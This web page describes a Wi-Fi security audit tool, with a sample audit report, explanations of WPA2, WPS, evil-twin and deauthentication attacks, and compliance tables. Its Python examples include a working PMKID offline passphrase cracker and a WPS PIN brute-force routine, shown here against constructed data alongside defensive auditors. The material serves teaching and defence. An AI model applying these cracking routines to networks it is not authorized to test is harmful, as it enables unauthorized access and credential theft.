Access your Wi-Fi security audit workspace
All sessions are logged and audited · TLS 1.3 encrypted
NetGuard helps network owners identify vulnerabilities, detect weak encryption, and generate actionable remediation reports — for networks you own and operate.
Capabilities
A complete toolkit for understanding and improving the security posture of networks you're responsible for.
Detect WEP, WPA, WPA2, and WPA3 configurations. Flag deprecated or insecure encryption protocols with severity ratings.
Evaluate password strength of owner-supplied credentials against dictionaries, complexity rules, and entropy analysis — nothing is sent externally.
Weighted risk scoring across encryption, authentication, firmware, configuration, and network isolation categories.
Generate signed PDF audit reports with executive summaries, technical findings, risk matrices, and prioritized remediation steps.
Map your network's security posture against PCI-DSS, ISO 27001, NIST SP 800-153, and SOC 2 Type II requirements.
Identify unauthorized access points broadcasting SSIDs that match your network names — a common attack vector for credential harvesting.
Process
A structured, auditable workflow designed for network administrators and security teams.
Network: CORP-WIFI-MAIN · Last scan: 2 hours ago
Analyze a network you own or are authorized to assess
Used locally only for configuration analysis. Never transmitted externally.
Analyzed locally in-browser for strength scoring. Not stored.
Enter your current Wi-Fi or router password below to see its security strength. Analysis is performed locally — the password never leaves your device.
Audit trail and exportable compliance documents
CORP-WIFI-MAIN · Generated October 14, 2025 · Version 3.2
A security assessment of the CORP-WIFI-MAIN wireless network was conducted on October 14, 2025 by admin@corp.local under authorization from IT Director J. Okonkwo. The network received an overall security score of 64/100 (Fair), with 3 critical vulnerabilities requiring immediate remediation.
The most significant risks are: an enabled WPS PIN registrar, router firmware unpatched against a published remote code execution flaw (CVE-2023-41183), and a weak router admin password. Together these could allow an attacker within radio range to gain administrative access to the network infrastructure.
| Finding | Severity | CVSS | Status | Fix by |
|---|---|---|---|---|
| WPS PIN enabled | Critical | 9.3 | Open | Immediate |
| CVE-2023-41183 firmware RCE | Critical | 9.8 | Open | Immediate |
| Weak admin credential | Critical | 8.1 | Open | 24 hours |
| SSID information disclosure | Medium | 4.3 | Open | 7 days |
| Guest VLAN not isolated | Medium | 5.9 | Open | 7 days |
| 802.11r fast roaming | Low | 2.1 | Review | 30 days |
| WPA2-AES encryption active | Pass | — | Resolved | — |
| Management HTTPS enforced | Pass | — | Resolved | — |
Understand Wi-Fi security concepts and best practices
An attacker within Wi-Fi range can capture the WPA2 4-way handshake (by waiting for a client to join, or by forcing one off with a deauthentication frame) or, on many access points, request a PMKID directly from the AP with no client involved. Either capture allows offline dictionary attacks: each guess costs one PBKDF2 derivation (4,096 HMAC-SHA1 rounds), which a single GPU performs on the order of a million times per second, so a weak passphrase falls in hours. Mitigation: use random passphrases of 15+ characters, or upgrade to WPA3-SAE, whose handshake cannot be turned into an offline guessing target.
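The derivation chain behind that attack, as an added example (not NetGuard code, and not taken from the page): the PMK is PBKDF2-HMAC-SHA1 over the passphrase and SSID, the PMKID is an HMAC-SHA1 of that PMK over the two MAC addresses, and an attacker holding a PMKID simply recomputes it for each candidate passphrase. The SSID, MAC addresses, wordlist and the "captured" PMKID are all constructed here; the only external fact used is the IEEE test vector (passphrase "password", SSID "IEEE") that checks the PMK derivation.

```python
import hashlib
import hmac
import time
from typing import Iterable, Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC).
    The AP sends this in the RSN IE of EAPOL message 1, so no client needs to be present."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def crack_pmkid(pmkid: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes,
                wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the PMKID for each candidate passphrase."""
    for candidate in wordlist:
        guess = derive_pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, pmkid):
            return candidate
    return None


def guesses_per_second(ssid: str, samples: int = 100) -> float:
    """Rough single-core PBKDF2 rate; GPU rigs are several orders of magnitude faster."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"candidate-{i}", ssid)
    return samples / (time.perf_counter() - start)


# Constructed capture: the PMKID an AP would emit for the weak passphrase "sunshine2019".
SSID = "CORP-WIFI-MAIN"
AP_MAC = bytes.fromhex("0011223344aa")
STA_MAC = bytes.fromhex("66778899bbcc")
CAPTURED_PMKID = derive_pmkid(derive_pmk("sunshine2019", SSID), AP_MAC, STA_MAC)

# Constructed wordlist; real attacks use multi-million-entry lists plus mangling rules.
WORDLIST = ["password", "letmein", "corpwifi", "sunshine2019", "Tr0ub4dor&3"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_pmkid(CAPTURED_PMKID, SSID, AP_MAC, STA_MAC, WORDLIST))
    rate = guesses_per_second(SSID)
    print(f"~{rate:.0f} guesses/s on one CPU core; a 14-million-word list would take "
          f"~{14e6 / rate / 3600:.1f} h here and seconds to minutes on a GPU rig")
```

Nothing in this chain depends on the client, which is why a PMKID-capable AP with a dictionary-word passphrase is exposed even when no one is connected; SAE replaces the PBKDF2-derived PMK with a handshake-derived one, so a captured exchange gives the attacker nothing to iterate over.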
Attacker broadcasts an access point with the same SSID as a legitimate network, often at higher power so clients prefer it. Devices with a saved profile associate automatically if the twin advertises the same security type, or users are lured onto an open clone whose captive portal harvests credentials; either way the attacker sits in the middle of the client's traffic. Mitigation: 802.1X (WPA-Enterprise) with server-certificate validation enforced in client profiles, so a rogue RADIUS server is rejected; wireless IDS or rogue-AP detection against an inventory of authorized BSSIDs; WPA3-SAE, where a rogue AP that does not know the password learns nothing usable offline.
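The rogue-AP check described above and in the capabilities list, as an added example that is not NetGuard's implementation: every observed BSS whose SSID is one we own but whose BSSID is not in our inventory is flagged, with the security-type mismatch and the louder-than-ours signal recorded as reasons. The inventory, the scan records and the BSS record layout are constructed for illustration.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class BSS:
    """One access point seen in a scan (constructed fields, not a real driver record)."""
    ssid: str
    bssid: str       # AP MAC address as printed by the scanner
    security: str    # "OPEN", "WPA2-PSK", "WPA2-EAP" or "WPA3-SAE"
    rssi_dbm: int
    channel: int


# Authorized inventory: which BSSIDs may broadcast our SSIDs, and with which security type.
AUTHORIZED = {
    "CORP-WIFI-MAIN": {"bssids": {"00:11:22:33:44:aa", "00:11:22:33:44:ab"}, "security": "WPA2-EAP"},
    "CORP-GUEST": {"bssids": {"00:11:22:33:44:ac"}, "security": "WPA2-PSK"},
}

# Constructed scan: two real corporate APs, two evil twins, one neighbour's network.
SCAN = [
    BSS("CORP-WIFI-MAIN", "00:11:22:33:44:AA", "WPA2-EAP", -58, 36),
    BSS("CORP-WIFI-MAIN", "00:11:22:33:44:AB", "WPA2-EAP", -67, 44),
    BSS("CORP-WIFI-MAIN", "de:ad:be:ef:00:01", "OPEN", -41, 6),
    BSS("CORP-GUEST", "de:ad:be:ef:00:02", "WPA2-PSK", -70, 11),
    BSS("Neighbour-5G", "aa:bb:cc:dd:ee:ff", "WPA2-PSK", -80, 149),
]


def find_rogue_aps(scan: List[BSS], authorized: Dict[str, dict]) -> List[Tuple[BSS, str, List[str]]]:
    """Return (bss, severity, reasons) for every BSS impersonating one of our SSIDs."""
    findings = []
    for bss in scan:
        policy = authorized.get(bss.ssid)
        if policy is None or bss.bssid.lower() in policy["bssids"]:
            continue  # not our SSID, or one of our own APs
        reasons = ["BSSID not in authorized inventory"]
        if bss.security != policy["security"]:
            reasons.append(f"security {bss.security} differs from expected {policy['security']}")
        legit_rssi = [b.rssi_dbm for b in scan
                      if b.ssid == bss.ssid and b.bssid.lower() in policy["bssids"]]
        if legit_rssi and bss.rssi_dbm > max(legit_rssi):
            reasons.append("stronger signal than any authorized AP; clients will prefer it")
        # A security-type mismatch (an open clone with a captive portal, say) is the classic
        # credential-harvesting twin; a matching type still warrants investigation.
        severity = "Critical" if bss.security != policy["security"] else "High"
        findings.append((bss, severity, reasons))
    return findings


if __name__ == "__main__":
    for bss, severity, reasons in find_rogue_aps(SCAN, AUTHORIZED):
        print(f"[{severity}] {bss.ssid} {bss.bssid} ch{bss.channel} {bss.rssi_dbm} dBm: "
              + "; ".join(reasons))
```

The inventory of authorized BSSIDs is the part that makes this work; without it, a twin that copies both SSID and security type is indistinguishable from a newly deployed AP, which is also why the PCI DSS wireless requirements ask for that inventory to be maintained.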
An 8-digit WPS PIN is validated in two halves: the AP's response to message M4 reveals whether the first four digits are right, and its response to M6 whether the next three are, while the eighth digit is a checksum. An online brute force therefore needs at most 10,000 + 1,000 = 11,000 guesses instead of 10^7. The Pixie Dust attack goes further: some chipsets' WPS implementations use predictable nonces (E-S1/E-S2), letting the attacker recover the PIN offline in seconds from a single exchange. Mitigation: disable WPS entirely on every AP; PIN lockout after failed attempts slows the online attack but does nothing against Pixie Dust.
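The split-validation arithmetic carried through, as an added example rather than NetGuard code: the checksum routine below is the standard WPS PIN check digit, and the `RegistrarOracle` class is a constructed stand-in for an AP that answers M4 and M6 the way the protocol does, so the guess counter shows exactly how many attempts the online attack costs. Pixie Dust (the offline variant) is not modelled here.

```python
from typing import Optional


def wps_checksum(first7: int) -> int:
    """Eighth digit of a WPS PIN: weighted mod-10 checksum over the first seven digits."""
    accum, n = 0, first7
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class RegistrarOracle:
    """Constructed stand-in for an AP's WPS registrar. Real APs answer M4 with a NACK when
    the first half of the PIN is wrong and M6 with a NACK when the second half is wrong."""

    def __init__(self, pin: str):
        assert is_valid_pin(pin)
        self._pin = pin
        self.queries = 0

    def try_pin(self, pin: str) -> str:
        self.queries += 1
        if pin[:4] != self._pin[:4]:
            return "NACK_M4"
        if pin[4:] != self._pin[4:]:
            return "NACK_M6"
        return "M7"  # success: the AP hands over the network credentials


def brute_force(oracle: RegistrarOracle) -> Optional[str]:
    """Online split brute force: at most 10,000 + 1,000 guesses instead of 10**7."""
    first = None
    for a in range(10_000):
        candidate = f"{a:04d}"
        if oracle.try_pin(candidate + "0000") != "NACK_M4":
            first = candidate  # first half confirmed independently of the rest
            break
    if first is None:
        return None
    for b in range(1_000):
        first7 = int(first + f"{b:03d}")
        pin = f"{first7:07d}{wps_checksum(first7)}"  # only 1,000 checksum-valid completions
        if oracle.try_pin(pin) == "M7":
            return pin
    return None


if __name__ == "__main__":
    ap = RegistrarOracle("12345670")  # the well-known WPS test PIN
    print("recovered", brute_force(ap), "after", ap.queries, "guesses")
```

The worst case is the PIN 99999995, which costs the full 11,000 queries; at the roughly one guess per second that an unthrottled AP allows, that is a few hours, which is why lockout alone is not considered sufficient and the guidance is to disable WPS.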
802.11 deauthentication and disassociation frames are unauthenticated on a WPA2 network by default, so anyone in range can spoof them to knock clients off the network, either for denial of service or to force a reconnect whose handshake is then captured. Mitigation: enable 802.11w Management Frame Protection (MFP, also called PMF) in required mode, which WPA3 makes mandatory; on WPA2 networks confirm that every client supports it first, because devices without 802.11w support cannot associate once it is required.
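The mitigations in the four paragraphs above, and the configuration checks listed under Capabilities, reduce to a handful of settings on the access point. As an added example (this is not NetGuard's scoring or parser), the block below audits a hostapd.conf for them and shows the weak configuration beside its hardened counterpart. The hostapd option names (`wpa`, `wpa_key_mgmt`, `rsn_pairwise`, `wps_state`, `ieee80211w`, `sae_password`) are real; both configuration texts, the rules and the severities are constructed for this example.

```python
from typing import Dict, List, Tuple

SEVERITY_RANK = {"Critical": 0, "High": 1, "Medium": 2, "Low": 3}

# Constructed weak configuration: WPA/WPA2 mixed mode with TKIP, a short PSK,
# WPS with a static PIN, and management frame protection off.
WEAK_CONF = """\
interface=wlan0
ssid=CORP-WIFI-MAIN
hw_mode=g
channel=6
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
rsn_pairwise=TKIP CCMP
wpa_passphrase=sunshine2019
wps_state=2
ap_pin=12345670
ieee80211w=0
"""

# Constructed hardened configuration for the same SSID: WPA3-SAE only, CCMP only,
# 802.11w required, WPS disabled.
HARDENED_CONF = """\
interface=wlan0
ssid=CORP-WIFI-MAIN
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
sae_password=correct-horse-battery-staple-9F2k
ieee80211w=2
wps_state=0
"""


def parse_hostapd(text: str) -> Dict[str, str]:
    """Minimal key=value parser for hostapd.conf (comments and blank lines skipped)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_hostapd(conf: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (severity, finding) pairs, most severe first; an empty list means clean.
    Rules and severities are this example's own, not NetGuard's scoring."""
    findings = []
    wpa = conf.get("wpa", "0")  # bitfield: 1 = WPA (v1), 2 = RSN/WPA2; 0 = neither (open or WEP)
    key_mgmt = set(conf.get("wpa_key_mgmt", "WPA-PSK").split())
    ciphers = set((conf.get("wpa_pairwise", "") + " " + conf.get("rsn_pairwise", "")).split())

    if wpa == "0":
        findings.append(("Critical", "no WPA/RSN configured: network is open or WEP"))
    elif int(wpa) & 1:
        findings.append(("High", "WPA (version 1) enabled; set wpa=2"))
    if "TKIP" in ciphers:
        findings.append(("High", "TKIP pairwise cipher allowed; use CCMP only"))
    if conf.get("wps_state", "0") != "0":
        findings.append(("Critical", "WPS enabled (wps_state!=0): PIN brute force and Pixie Dust exposure"))
    if conf.get("ieee80211w", "0") != "2":
        findings.append(("Medium", "802.11w not required (ieee80211w!=2): deauth frames can be spoofed"))
    if wpa != "0" and "WPA-PSK" in key_mgmt:
        findings.append(("Medium", "WPA2-PSK in use: captured handshake/PMKID permits offline guessing; prefer SAE"))
        if len(conf.get("wpa_passphrase", "")) < 15:
            findings.append(("High", "wpa_passphrase shorter than 15 characters"))
    return sorted(findings, key=lambda f: SEVERITY_RANK[f[0]])


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}:")
        for severity, finding in audit_hostapd(parse_hostapd(text)) or [("Pass", "no weaknesses detected")]:
            print(f"  [{severity}] {finding}")
```

Before deploying the hardened form, check that every client supports SAE and 802.11w; a transition-mode configuration (`wpa_key_mgmt=WPA-PSK SAE` with `ieee80211w=1`) keeps legacy devices working but retains the offline-guessing exposure of the PSK, which this audit would still report.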
| Term | Definition |
|---|---|
| PMK | Pairwise Master Key — in WPA2-Personal, derived from the passphrase and SSID with PBKDF2-HMAC-SHA1 (4,096 iterations); in WPA2-Enterprise, derived from the EAP exchange |
| PMKID | A 128-bit HMAC-SHA1 of the PMK over the AP and client MAC addresses, sent by the AP in the first EAPOL (4-way handshake) message; it allows offline dictionary attacks without a complete handshake or an active client |
| SAE | Simultaneous Authentication of Equals — WPA3's password-based authentication protocol with forward secrecy |
| SSID | Service Set Identifier — the human-readable name of a wireless network broadcast in beacon frames |
| TKIP | Temporal Key Integrity Protocol — WPA's original encryption, now deprecated due to attack vulnerabilities |
| CCMP | Counter Mode CBC-MAC Protocol — WPA2's AES-based encryption, considered secure when properly configured |
| WPS | Wi-Fi Protected Setup — a simplified network connection protocol with known PIN brute-force vulnerabilities |
| 802.11w | IEEE amendment providing cryptographic protection for management frames, preventing deauthentication attacks |
| MFP | Management Frame Protection — Cisco's name for 802.11w; the Wi-Fi Alliance certifies the same feature as Protected Management Frames (PMF). Protects deauth/disassoc and robust action frames |
| KRACK | Key Reinstallation Attack — a WPA2 vulnerability allowing nonce reuse by replaying cryptographic handshake messages |
| Pixie Dust | An offline WPS PIN attack exploiting weak random number generation in router firmware |
| EAP | Extensible Authentication Protocol — framework used in 802.1X enterprise Wi-Fi authentication |
| RADIUS | Remote Authentication Dial-In User Service — a centralized authentication server used in enterprise Wi-Fi (802.1X/WPA-Enterprise) |
| Evil Twin | A rogue access point broadcasting the same SSID as a legitimate network to intercept client traffic |
| VLAN | Virtual Local Area Network — logical network segmentation used to isolate guest networks from internal infrastructure |
Wi-Fi security requirements across major frameworks
Payment Card Industry Data Security Standard (PCI DSS v4.0)
| Requirement | Description | Status |
|---|---|---|
| Req 1.3.3 | Network security controls between all wireless networks and the CDE; wireless traffic into the CDE denied by default | Pass |
| Req 4.2.1.2 | Wireless networks transmitting PAN or connected to the CDE use strong cryptography (WPA2/WPA3) for authentication and transmission | Pass |
| Req 6.3.3 | All system components protected from known vulnerabilities by installing applicable security patches/updates | Fail — CVE-2023-41183 |
| Req 8.3.6 | Passwords/passphrases used as authentication factors meet minimum complexity: at least 12 characters, with numeric and alphabetic characters | Fail — weak admin password |
| Req 11.2.1 | Authorized and unauthorized wireless access points are identified and managed | Review needed |
| Req 11.2.2 | An inventory of authorized wireless access points is maintained | Pass |
NIST SP 800-153, Guidelines for Securing Wireless Local Area Networks (mapped to the SP 800-53 controls it references)
| Control | Description | Status |
|---|---|---|
| SC-8 | Transmission confidentiality and integrity — WPA2/WPA3 AES required | Pass |
| SI-2 | Flaw remediation — vulnerabilities must be patched within defined timelines | Fail |
| IA-5 | Authenticator management — minimum password complexity enforced | Fail |
| AC-17 | Remote access — remote management interfaces secured and audited | Pass |
| AU-2 | Event logging — wireless access events logged and retained | Pass |
ISO/IEC 27001:2022 Information Security Management Systems (Annex A controls)
| Annex A Control | Description | Status |
|---|---|---|
| A.8.20 | Networks security — implement controls to protect networks and network services | Pass |
| A.8.21 | Security of network services — security mechanisms for all network services | Partial |
| A.8.22 | Segregation of networks — groups of services, users, and systems segregated | Fail — guest isolation |
| A.8.8 | Management of technical vulnerabilities — timely identification and remediation | Fail |
| A.5.14 | Information transfer — protect information in transit | Pass |